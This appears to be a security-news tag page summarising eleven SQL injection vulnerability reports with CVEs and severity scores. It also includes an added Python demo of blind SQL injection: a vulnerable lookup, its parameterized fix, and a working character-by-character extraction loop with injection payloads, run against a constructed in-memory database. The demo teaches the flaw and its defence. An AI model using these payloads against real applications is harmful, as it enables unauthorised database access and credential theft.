#sql-injection
11 articles
Between April 14 and May 23, 2026, ZCyberNews published 12 articles on SQL injection (11 of them listed on this page): 2 rated medium, 3 high, and 7 critical severity. The most severe vulnerability, CVE-2026-27681, carries a CVSS score of 9.9; CVE-2026-36962, CVE-2026-42208, and CVE-2026-6433 each scored 9.8, and CVE-2026-34259 scored 9.6. Enterprise software, web hosting, e-commerce, retail, and software development were the most affected sectors, with Europe and North America the most affected regions and several of the flaws hitting deployments worldwide.
[MEDIUM] CVE-2026-9082: Drupal Core SQL Injection Bug Added to CISA KEV
CISA added CVE-2026-9082 (CVSS 6.5) to its Known Exploited Vulnerabilities catalog after evidence of active exploitation against all supported Drupal Core versions.
[HIGH] Avada Builder WordPress Plugin Flaws Expose Site Credentials
CVE-2026-4782 and CVE-2026-4798 in Avada Builder (1M+ installs) let attackers read wp-config.php and extract database hashes. Patch to version 3.15.3.
[CRITICAL] SAP Patches Critical S/4HANA, Commerce Flaws with 9.6 CVSS
SAP released 15 security notes for May 2026, fixing two critical code injection flaws in S/4HANA (CVE-2026-34260) and Commerce (CVE-2026-34263), both rated 9.6 CVSS, and a...
[CRITICAL] Unauthenticated SQL Injection in MuuCMF T6 Allows Database Takeover
CVE-2026-36962: Unauthenticated SQL injection in MuuCMF T6 v1.9.4.20260115 lets attackers dump databases, gain admin access, and achieve RCE via file writes.
[CRITICAL] Corteza SQL Injection Flaw CVE-2026-6093 Lets Attackers Dump Databases
CVE-2026-6093: A SQL injection vulnerability in Corteza's MSSQL backend allows unauthenticated attackers to extract database contents via Compose record meta-field filters.
[CRITICAL] Custom css-js-php WordPress Plugin SQLi Leads to RCE (CVE-2026-6433)
CVE-2026-6433: Unauthenticated SQL injection in Custom css-js-php plugin ≤2.0.7 lets attackers execute arbitrary PHP via eval(). No patch available.
[HIGH] Opencart TMD Vendor System 3.x SQLi Lets Attackers Dump User
CVE-2021-47928 (CVSS 8.2): Unauthenticated blind SQL injection in Opencart TMD Vendor System 3.x lets attackers extract usernames, emails, and password reset codes from the...
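The blind extraction the Opencart item above describes, as an added, self-contained example that is not code from that product, its advisory, or this site: a lookup endpoint that only answers whether a username exists, written once with string splicing and once with a bound parameter, plus the character-by-character oracle loop an attacker runs against the vulnerable form. The table, column names and rows are constructed for the demo, and it runs against an in-memory SQLite database.

```python
"""Boolean-based blind SQL injection: a vulnerable lookup, the parameterized fix,
and the extraction loop that turns a yes/no answer into a leaked column.
Added example, not code from any product or article on this page; all table
names, column names and rows are constructed for the demo."""
import sqlite3
import string


def build_db() -> sqlite3.Connection:
    """In-memory SQLite database seeded with constructed sample rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "email TEXT, reset_code TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, email, reset_code) VALUES (?, ?, ?)",
        [("alice", "alice@example.test", "R7x2kq"),
         ("bob", "bob@example.test", "mZ41pa")],
    )
    conn.commit()
    return conn


def user_exists_vulnerable(conn: sqlite3.Connection, username: str) -> bool:
    """Vulnerable: the caller-controlled value is spliced into the SQL text.
    The endpoint only reveals whether a row matched, so it is a boolean oracle."""
    sql = f"SELECT 1 FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchone() is not None


def user_exists_fixed(conn: sqlite3.Connection, username: str) -> bool:
    """Hardened: a bound parameter, so the input is only ever compared as data."""
    sql = "SELECT 1 FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone() is not None


ALPHABET = string.ascii_letters + string.digits


def blind_extract(oracle, column: str, target_user: str, max_len: int = 16) -> str:
    """Recover `column` for `target_user` one character at a time using only the
    yes/no oracle. Each probe closes the original string literal with a quote,
    ANDs in a SUBSTR() comparison on a subquery, and comments out the rest of the
    statement (SQLite and MySQL both accept `-- ` line comments). Stops at the first
    position where no alphabet character matches: the end of the value, or a
    character outside ALPHABET."""
    recovered = ""
    for pos in range(1, max_len + 1):
        found = None
        for c in ALPHABET:
            payload = (
                f"{target_user}' AND SUBSTR((SELECT {column} FROM users "
                f"WHERE username='{target_user}'),{pos},1)='{c}' -- "
            )
            if oracle(payload):
                found = c
                break
        if found is None:
            break
        recovered += found
    return recovered


def demo() -> tuple:
    """Run the extraction against both variants and return (leaked, blocked):
    the vulnerable lookup yields alice's reset code; the parameterized one treats
    every payload as a username that does not exist and leaks nothing."""
    conn = build_db()
    leaked = blind_extract(lambda u: user_exists_vulnerable(conn, u), "reset_code", "alice")
    blocked = blind_extract(lambda u: user_exists_fixed(conn, u), "reset_code", "alice")
    return leaked, blocked


if __name__ == "__main__":
    print(demo())
```

Run it directly to print the tuple. The vulnerable lookup leaks the reset code at roughly one probe per alphabet character per position, which is what "blind" means here: no data ever comes back in a response body, only a true/false difference. The parameterized lookup receives the identical payloads and returns nothing, because the driver hands them to the database as a value to compare rather than as SQL to parse.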
[MEDIUM] JeecgBoot SQLi Flaw CVE-2026-8114 Exploit Publicly Available
CVE-2026-8114 (CVSS 6.5) in JeecgBoot up to 3.9.1 enables remote SQL injection via the /sys/dict/loadTreeData endpoint. Exploit code is public.
[CRITICAL] LiteLLM CVE-2026-42208 Pre-Auth SQLi Exploited in Attacks
Attackers exploit CVE-2026-42208, a critical pre-authentication SQL injection in LiteLLM LLM gateway, to steal API keys and model data. CVSS 9.8. No patch yet.
[HIGH] DriveLock Privilege Escalation Flaw Allows Attackers to Bypass Security
A critical SQL injection vulnerability (CVE-2026-5490) in DriveLock endpoint security software allows authenticated attackers to escalate privileges and bypass the product's own security controls, according to the Zero Day Initiative.
[CRITICAL] SAP Patches Critical SQL Injection Flaw in Business Planning and Consolidation
SAP has patched a critical SQL injection vulnerability (CVE-2026-27681, CVSS 9.9) in its Business Planning and Consolidation and Business Warehouse applications, allowing attackers to execute arbitrary database commands.